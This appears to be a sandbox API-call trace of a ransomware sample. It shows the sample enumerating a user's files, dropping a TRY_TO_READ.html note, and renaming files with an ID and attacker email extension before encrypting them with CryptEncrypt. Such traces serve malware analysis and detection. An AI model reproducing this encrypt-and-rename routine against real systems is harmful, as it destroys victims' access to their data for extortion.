	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca273110, ftCreationTime.dwHighDateTime=0x1d4d25b, ftLastAccessTime.dwLowDateTime=0x3e268cd0, ftLastAccessTime.dwHighDateTime=0x1d4c5c5, ftLastWriteTime.dwLowDateTime=0x3e268cd0, ftLastWriteTime.dwHighDateTime=0x1d4c5c5, nFileSizeHigh=0x0, nFileSizeLow=0x1408c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NEuf1yaxz-rWXuqP f.flv", cAlternateFileName="NEUF1Y~1.FLV")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc79d540, ftCreationTime.dwHighDateTime=0x1d4cacf, ftLastAccessTime.dwLowDateTime=0xdcb24d80, ftLastAccessTime.dwHighDateTime=0x1d4d55b, ftLastWriteTime.dwLowDateTime=0xdcb24d80, ftLastWriteTime.dwHighDateTime=0x1d4d55b, nFileSizeHigh=0x0, nFileSizeLow=0x108dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OcXY.avi", cAlternateFileName="")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f3ba8d0, ftCreationTime.dwHighDateTime=0x1d4d33e, ftLastAccessTime.dwLowDateTime=0xc2cf0fe0, ftLastAccessTime.dwHighDateTime=0x1d4c645, ftLastWriteTime.dwLowDateTime=0xc2cf0fe0, ftLastWriteTime.dwHighDateTime=0x1d4c645, nFileSizeHigh=0x0, nFileSizeLow=0x1518c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl9elQOfCmP 8cR56s.gif", cAlternateFileName="PL9ELQ~1.GIF")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x326b5a00, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x61811370, ftLastAccessTime.dwHighDateTime=0x1d4c7c9, ftLastWriteTime.dwLowDateTime=0x61811370, ftLastWriteTime.dwHighDateTime=0x1d4c7c9, nFileSizeHigh=0x0, nFileSizeLow=0x8f39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rxlIU4LilO_c5145.m4a", cAlternateFileName="RXLIU4~1.M4A")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c4e2ea0, ftCreationTime.dwHighDateTime=0x1d4ce49, ftLastAccessTime.dwLowDateTime=0x7dc370a0, ftLastAccessTime.dwHighDateTime=0x1d4cc74, ftLastWriteTime.dwLowDateTime=0x7dc370a0, ftLastWriteTime.dwHighDateTime=0x1d4cc74, nFileSizeHigh=0x0, nFileSizeLow=0x7353, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SQhWEt.m4a", cAlternateFileName="")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce6f5cb0, ftCreationTime.dwHighDateTime=0x1d4c613, ftLastAccessTime.dwLowDateTime=0x88da2f50, ftLastAccessTime.dwHighDateTime=0x1d4c5e5, ftLastWriteTime.dwLowDateTime=0x88da2f50, ftLastWriteTime.dwHighDateTime=0x1d4c5e5, nFileSizeHigh=0x0, nFileSizeLow=0x4d2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suhn.swf", cAlternateFileName="")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21bba4f0, ftCreationTime.dwHighDateTime=0x1d4d000, ftLastAccessTime.dwLowDateTime=0xbd81f820, ftLastAccessTime.dwHighDateTime=0x1d4c95d, ftLastWriteTime.dwLowDateTime=0xbd81f820, ftLastWriteTime.dwHighDateTime=0x1d4c95d, nFileSizeHigh=0x0, nFileSizeLow=0x189ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="szS27QOX-t.png", cAlternateFileName="SZS27Q~1.PNG")) returned 1
	[0105.754] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80858ff0, ftCreationTime.dwHighDateTime=0x1d4c9d9, ftLastAccessTime.dwLowDateTime=0xfa759830, ftLastAccessTime.dwHighDateTime=0x1d4ce3b, ftLastWriteTime.dwLowDateTime=0xfa759830, ftLastWriteTime.dwHighDateTime=0x1d4ce3b, nFileSizeHigh=0x0, nFileSizeLow=0x69b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tfyC_hdr9nRJn24ro4Ft.flv", cAlternateFileName="TFYC_H~1.FLV")) returned 1
	[0105.755] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60a9730, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0105.755] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a869d60, ftCreationTime.dwHighDateTime=0x1d4d20d, ftLastAccessTime.dwLowDateTime=0x6d75de10, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x6d75de10, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x13815, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vJvVpBlJ6.mp4", cAlternateFileName="VJVVPB~1.MP4")) returned 1
	[0105.755] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x419efbf0, ftCreationTime.dwHighDateTime=0x1d4ce2f, ftLastAccessTime.dwLowDateTime=0xbd9cafa0, ftLastAccessTime.dwHighDateTime=0x1d4d36f, ftLastWriteTime.dwLowDateTime=0xbd9cafa0, ftLastWriteTime.dwHighDateTime=0x1d4d36f, nFileSizeHigh=0x0, nFileSizeLow=0xa091, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xf nkV2_nHsz.m4a", cAlternateFileName="XFNKV2~1.M4A")) returned 1
	[0105.755] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a1cc380, ftCreationTime.dwHighDateTime=0x1d4cbe9, ftLastAccessTime.dwLowDateTime=0x35a922c0, ftLastAccessTime.dwHighDateTime=0x1d4ccb9, ftLastWriteTime.dwLowDateTime=0x35a922c0, ftLastWriteTime.dwHighDateTime=0x1d4ccb9, nFileSizeHigh=0x0, nFileSizeLow=0xe7ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yKAtPKr.m4a", cAlternateFileName="")) returned 1
	[0105.755] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd74f40, ftCreationTime.dwHighDateTime=0x1d4ca8b, ftLastAccessTime.dwLowDateTime=0x50448570, ftLastAccessTime.dwHighDateTime=0x1d4cabb, ftLastWriteTime.dwLowDateTime=0x50448570, ftLastWriteTime.dwHighDateTime=0x1d4cabb, nFileSizeHigh=0x0, nFileSizeLow=0xfab2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YRaDoPgrJ.pdf", cAlternateFileName="YRADOP~1.PDF")) returned 1
	[0105.755] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd74f40, ftCreationTime.dwHighDateTime=0x1d4ca8b, ftLastAccessTime.dwLowDateTime=0x50448570, ftLastAccessTime.dwHighDateTime=0x1d4cabb, ftLastWriteTime.dwLowDateTime=0x50448570, ftLastWriteTime.dwHighDateTime=0x1d4cabb, nFileSizeHigh=0x0, nFileSizeLow=0xfab2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YRaDoPgrJ.pdf", cAlternateFileName="YRADOP~1.PDF")) returned 0
	[0105.755] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.755] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.755] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf", dwFileAttributes=0x80) returned 1
	[0105.756] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf") returned 60
	[0105.756] GetProcessHeap () returned 0x540000
	[0105.756] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x603bd0
	[0105.756] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf"
	[0105.756] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.756] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yradopgrj.pdf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yradopgrj.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.760] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YRaDoPgrJ.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yradopgrj.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.760] GetProcessHeap () returned 0x540000
	[0105.760] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.760] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=64178) returned 1
	[0105.760] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xfab2
	[0105.760] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.760] GetProcessHeap () returned 0x540000
	[0105.760] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.760] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.762] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.763] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.763] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.763] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xfab2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xfab2, lpOverlapped=0x0) returned 1
	[0105.765] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.765] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.765] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a", dwFileAttributes=0x80) returned 1
	[0105.766] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a") returned 58
	[0105.766] GetProcessHeap () returned 0x540000
	[0105.766] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x603bd0
	[0105.766] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a"
	[0105.766] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.766] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ykatpkr.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ykatpkr.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.769] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKAtPKr.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ykatpkr.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.769] GetProcessHeap () returned 0x540000
	[0105.769] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.769] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=59338) returned 1
	[0105.769] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe7ca
	[0105.769] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.769] GetProcessHeap () returned 0x540000
	[0105.769] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.769] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.771] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.772] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.772] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.773] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xe7ca, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xe7ca, lpOverlapped=0x0) returned 1
	[0105.774] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.774] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.774] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a", dwFileAttributes=0x80) returned 1
	[0105.775] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a") returned 63
	[0105.775] GetProcessHeap () returned 0x540000
	[0105.775] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x56efb8
	[0105.775] lstrcpyW (in: lpString1=0x56efb8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a"
	[0105.775] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.775] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xf nkv2_nhsz.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xf nkv2_nhsz.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.778] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Xf nkV2_nHsz.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xf nkv2_nhsz.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.779] GetProcessHeap () returned 0x540000
	[0105.779] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56efb8 | out: hHeap=0x540000) returned 1
	[0105.779] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=41105) returned 1
	[0105.779] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa091
	[0105.779] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.779] GetProcessHeap () returned 0x540000
	[0105.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.779] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.781] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.781] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.782] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.782] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xa091, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xa091, lpOverlapped=0x0) returned 1
	[0105.783] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.783] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.783] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4", dwFileAttributes=0x80) returned 1
	[0105.783] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4") returned 60
	[0105.783] GetProcessHeap () returned 0x540000
	[0105.783] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x603bd0
	[0105.783] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4"
	[0105.784] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.784] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vjvvpblj6.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vjvvpblj6.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.786] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vJvVpBlJ6.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vjvvpblj6.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.786] GetProcessHeap () returned 0x540000
	[0105.786] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.786] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=79893) returned 1
	[0105.787] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x13815
	[0105.787] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.787] GetProcessHeap () returned 0x540000
	[0105.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
